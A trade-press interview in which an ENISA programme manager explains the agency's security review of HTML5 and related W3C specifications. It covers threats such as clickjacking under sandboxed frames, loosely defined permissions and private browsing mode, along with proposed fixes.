Improving Internet SafetyENISA Tackles Security Issues for Future Web Browsers
The team at the European Network and Information Security Agency identified 50 security threats that exist within the new web standards and sent recommendations for how they should be addressed to W3C.
"In some cases, we're not actually expecting W3C to necessarily be able to fix all the problems, but what we're trying to do is flag some of the risks to the end users," says Dr. Giles Hogben, programme manager for secure services at ENISA.
Hogben and his team went through over 1,000 pages of specs for HTML5, which focused on device specifications for access to items such as GPS and smartphones, and packaged applications called widgets. They also analyzed browser security and privacy from the user's perspective.
"We ... looked at the role of the user in actually policing security and what's the role of the user in actually making secure decisions in the specifications in the browser," Hogben says in an interview with BankInfoSecurity.com's Tom Field [transcript below].
In an exclusive interview about ENISA's recommendations, Hogben discusses:
- ENISA's multi-layered efforts to improve security standards;
- Specific recommendations made regarding fixes to the pending web standards;
- Other online security initiatives being pursued by the agency.
Dr. Hogben is programme manager for secure services at the European Network and Information Security Agency in Greece. He has led numerous studies on Network and Information security, including on topics such as Smartphone security, Cloud computing, Social Network security and European Identity card privacy. Before joining ENISA, he was a researcher at the Joint Research Centre in Ispra, Italy and led work on private credentials. He has a PhD in Computer Science from Gdansk University of Technology in Poland and graduated from Oxford University, UK in 1994 in Physics and Philosophy.
TOM FIELD: To begin, could you tell us a little bit about yourself and your work with ENISA, please?
GILES HOGBEN: I'm an infosec guy. I've been working in information security and privacy for over 10 years now, and I work for ENISA, as you mentioned. ENISA is the European Union body which is responsible for information security, and we advise the commission and the member states, and we also collect information from the industry on best practices in security. Now my program, in particular, that I head up focuses on application security rather than infrastructure security that many of our teams focus on. In the last couple of years in particular, we've been looking at cloud computing, browser security, smartphones and secure development. That's been our main area of focus.
Improving New Web StandardsFIELD: What really got my attention was that ENISA has just released a set of recommended security fixes for new web standards. Could you give us a little bit of background on these standards?
HOGBEN: We've just released this report. HTML5 is the first major upgrade to the web browser standards in over 10 years. So we saw this as a major opportunity to get some "security by design" in there. HTML5 introduces a whole suite of new features to browsers, some of which have quite important implications for security. And it's also come along with a number of other specifications which support the new features, and they also have important security implications. There's HTML5 and there's also the device API specifications, which give access to things like GPS and smartphones. There are also a number of new specifications which allow access across origins. Before, web security was relying on what's called single-origin policy, but a lot of developers were finding tricky ways to get around that. These new specifications kind of clean up the mess of communicating between web applications from different origins. There's also a bunch of specifications around packaged applications called widgets. We have analyzed 13 of these specifications in total, focusing on HTML5, and that adds up to over 1,000 pages of specs, so it's really been a huge amount of work.
FIELD: Well given the criticality of what you've just described to me, what makes the timing of this report so crucial?
HOGBEN: As I said, this is the first time in over 10 years that we've actually had a chance to have some security by design actually influence these new standards. This is really a historic, unique window of opportunity for us to actually influence the security of the browser. It's really quite amazing the timing, because we finished our report and we published it just two days before the last call for comments on HTML5. We managed to contribute to the standards at exactly the right time. After [this], security could be baked in for the next decade or more. So this is really a unique opportunity.
Issues with HTML5FIELD: Given that opportunity, can you give us an overview of some of the recommended fixes that you proposed?
HOGBEN: Sure. I'm going to go through a few examples of the threats that we identified and maybe some of the fixes as well. Before I go into the detail of that, I just want to say that we looked at not only the individual specifications like HTML5 cores and the widget specifications, but we also looked at how they fit together. We found a number of issues that actually arise and threats that come from the way the specifications are slot together and the inconsistencies between the specifications. We also looked at the role of the user in actually policing security and what's the role of the user in actually making secure decisions in the specifications in the browser.
Let's look at a few examples of stuff that we identified. I divide the examples into two main areas. One is new features of specifications which allow new attacks which would give access to the user's data. The other area is around defining permissions and how there are some inconsistencies and issues that we identified around permissions.
First of all, looking at the threats we identified around access to data and new attacks, the first example I'd like to look at is the new sandbox element. That's a new element in HTML5 which is supposed to completely isolate a browsing context, like an iframe, from the rest of the browser. That's a great thing, of course, but it also has some unexpected consequences in terms of security. It actually stops some of the protections that the user previously had against click jacking. Click jacking is when you hijack the user's user interface and you overlay part of one frame, or a page from one origin, over another origin, and you trick the user into clicking on a place on the page that they really shouldn't be in and submitting information to an attacker. One of the ways of protecting against that was to check whether your page is actually being framed, because the way to implement click jacking is to frame a trusted page inside an untrusted page. And if that trusted page is inside a sandbox, it can't actually make those checks. The basic threat there is that the sandbox actually makes it impossible to implement the protection against click jacking that you could do before.
Another interesting threat is that form buttons can now be placed anywhere in the HTML of a page. Whereas before you had to have them inside a form element, now the attacker has a much greater possibility, a much greater range of places where they can actually inject, via HTML injection, a button and persuade the user to submit information to the attacker.
We also looked at the new ability to specify an online content handler. For example, you can now specify a remote URL to manage things like word processing documents, and we found that there's not really a well-defined trust model for allowing the user to decide which of those content handlers he/she should trust or not. Also we found that there's no real management of the permissions that you give to content handlers so that the user would give permission once and then completely forget what they've given permission for. There are a number of well-known security vulnerabilities that have arisen in the past around that, where you have very obscure content handlers which have been exploited by attackers.
We also found some issues around GPS, the handling of location data. For example, the GPS cache gives a timestamp, and we actually questioned why this timestamp is necessary. Why do we need to know when the GPS data is recorded? Those are the issues around access to data.
Then we had a whole load of issues that we found around permissions. First of all, one of the questions that we asked is in situations where you have different browsing contexts like a frame within a wider document, and you're using the address of the page as the basis for permission. It's not defined in the specification what should be used as the origin, whether it should be the document origin or the frame origin.
Another really interesting area is around this emerging feature that you find in most browsers - private browsing mode. What we found is that the specifications really don't give enough information about how the browser should behave when it's in private browsing mode. For example, if you give permission to a site to do something when you're in private browsing mode, should that permission be stored? What happens to data that's cached when you're in private browsing mode?
Finally on permissions, the specifications defined two different kinds of access to the location data, what's called one-shot access and monitoring. Obviously the one-shot is like a single snapshot of your location, and monitoring is a continuous access to your location. But the spec doesn't tell you whether I should ask permission in a different way to those two very different kinds of access to your data. In terms of how we think this should be fixed, a lot of this comes from, say, inconsistencies across the specifications, and so we think that W3C should think about having a separate specification which deals exclusively with permissions. That would help to create a consistency across the different specifications in how permissions are dealt with.
We also see issues with permissions in the specs and how they interact, for example, with an underlying operating system in a smartphone. If you're going to start using HTML for smartphone apps, which is something that a lot of people are talking about, there are going to be permissions asked by the iOS or Android, which might actually conflict or confuse the user when they're also asked in HTML5. We think there really needs to be a coordination across the different areas of specification when it comes to permissions. That was a long answer, but that's the main part of our report so I wanted to give you lots of information there.
FIELD: Those are great details and great suggestions. What's next in the process here?
HOGBEN: We have submitted 50 different threats that we've discovered to the working groups, and we're in the process of discussing that with W3C. I think the next kind of checkpoint in the standards processes will be in January next year, so we're hoping we'll see resolution to our comments by January. We've published the report and we've also extracted the key points for each working group, and we've sent it out to the W3C working groups.
Other Areas for ImprovementFIELD: Meanwhile, your own work with ENISA continues. What are some of the other areas that you're working on now for improved online security?
HOGBEN: We are working on a set of secure development guidelines for smartphones. That's a big area that we're hopeful is going to make a big difference, so I'm working with OWASP [Open Web Application Security Project] on secure smartphone development guidelines. And we'll also be promoting some of the advice that we've given to end users on the basis of this analysis of HTML5 and the related specs. It's not just about improving the specifications because we see that a lot of the design decisions that have created some of the security issues they've actually been made for a good reason, to make the browser more usable in certain ways. For example, allowing the form buttons outside of the form area actually creates a lot more flexibility to the web developers.
In some cases, we're not actually expecting W3C to necessarily be able to fix all the problems, but what we're trying to do is flag some of the risks to the end users. In that context, we made the advice that users should use different browsers for different kinds of surfing. If they're doing, for example, banking, they should use one browser or a different browsing context. In my job, I spend a lot of my time researching security vulnerabilities, and I might end up going to some dodgy websites. I should then use a different browsing context for that. At the moment you can use a different browser for each of those contexts, but we're hoping that we might persuade some of the browser manufacturers, vendors like Firefox and Chrome, to actually make that separation of context easier within an individual browser so that I could have different settings for different contexts. I might, for example, be able to turn off some of the more insecure features that you see which are necessary for more user-sensitive browsing, when I'm doing something much more sensitive like Internet banking.
That's one of the areas that we're really going to be promoting, and also we want to be looking at trying to get a formal specification of how the browser should behave in private browsing mode. Because at the moment, we think having all the browsers having a private browsing mode is a great thing, but then it's not really well defined enough in the W3C specifications. We'd like to promote that as the next step to create a private browsing mode specification that is common across the different browsers. And as I mentioned also, we think that creating a common permission spec is something that we want to promote. Also, we see a number of initiatives coming up like CSP, which is content security policy. They are really going, we think, in the right direction in terms of creating control over functionality that web pages implement.
Another really interesting initiative, from my point-of-view, is strict transport security, the ability for a web page to say to the client, "I'm only going to communicate with you using https." I think that's a really useful feature that we would like to support. That pretty much sums it up in terms of where we're going.